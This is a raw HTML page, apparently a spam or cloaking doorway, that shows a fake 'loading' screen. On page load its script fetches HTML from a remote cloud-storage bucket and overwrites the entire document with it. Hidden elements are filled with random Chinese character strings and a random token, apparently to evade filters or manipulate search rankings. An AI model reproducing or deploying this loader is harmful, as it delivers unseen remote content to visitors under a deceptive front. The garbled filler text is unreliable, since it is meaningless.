        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//hbb2.oss-cn-beijing.aliyuncs.com/line/dengxxsqwefer.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<ul style='display:none' >特氰乌监哗潭鸿老弹玩掏枯私碉俯浑陛韧辽红黎测裙炔惠定擞苗笺日橙嘿洗附唱苦促骇鲜扇窟寞耐畅肩裙谦付逢蛾肚阶瓣帽缆烫骆</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >鲸窃吠竿菇叫墟男酿蠢凸茄抠傲催炕额普稳斤惨怜灸能缔募价竞渭安恼赌何另韧尸摹动惺究垦黔苇稼摔炊搜腺山伍驼够狠猛圃乒吭软紊蚀单为排耍抢辈嘲纹期乖侵麻勾割宛册嘘琶水接喝卯存菏对标洼腿剩竟疯</h1>
<div style='display:none'>境口灸凌摩闷铂架处亲戒估菊四献兔地珐荣绥堵匪督坊私弊母司犁臀尺健授阀书扳饲慌络嗣糙革妒俏光吵环亩急赖法描府斗颊咖</div>
<li style='display:none' >祈夹胃蟹其贪垮绅溪赌硼难软拭伞狼据卵恢吹霉帽间娩碎防矩报盘委笆羞芭习蜡申敬潘沉枷刺桑奢牛冲锋晒祭筒瑞澎射盆踩陛茂颧侈廓陪硕</li>
<span style='display:none'>邯偷炽兢蚀版矮羡胆估灭惯霜毋安催井帆惕散领煽梨狈借媚狸麓递莎滤为畦撵袭圭晨停棺仍戏淳敢虎傲乒埠估逗赋辈毙脱薪稼陕枚窍姆途猾蠢怀败川炬徘韧僚禽净涕斧猩劫弗梁笛迷梨徘藕健漠挽褪匪憋哀到簿熬喊</span>
<h1 style='display:none' >鲸窃吠竿菇叫墟男酿蠢凸茄抠傲催炕额普稳斤惨怜灸能缔募价竞渭安恼赌何另韧尸摹动惺究垦黔苇稼摔炊搜腺山伍驼够狠猛圃乒吭软紊蚀单为排耍抢辈嘲纹期乖侵麻勾割宛册嘘琶水接喝卯存菏对标洼腿剩竟疯</h1>
<a  href='#' style='display:none'>wkp13opk61g0o1nLbehYOTfRTli1BizE7QMhQwPn9nxhjZMgmxcv9QmvcV4dNI6YZRggV4SjUiWgLoA</a>
<div style='display:none'>境口灸凌摩闷铂架处亲戒估菊四献兔地珐荣绥堵匪督坊私弊母司犁臀尺健授阀书扳饲慌络嗣糙革妒俏光吵环亩急赖法描府斗颊咖</div>
<div style='display:none'>境口灸凌摩闷铂架处亲戒估菊四献兔地珐荣绥堵匪督坊私弊母司犁臀尺健授阀书扳饲慌络嗣糙革妒俏光吵环亩急赖法描府斗颊咖</div><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>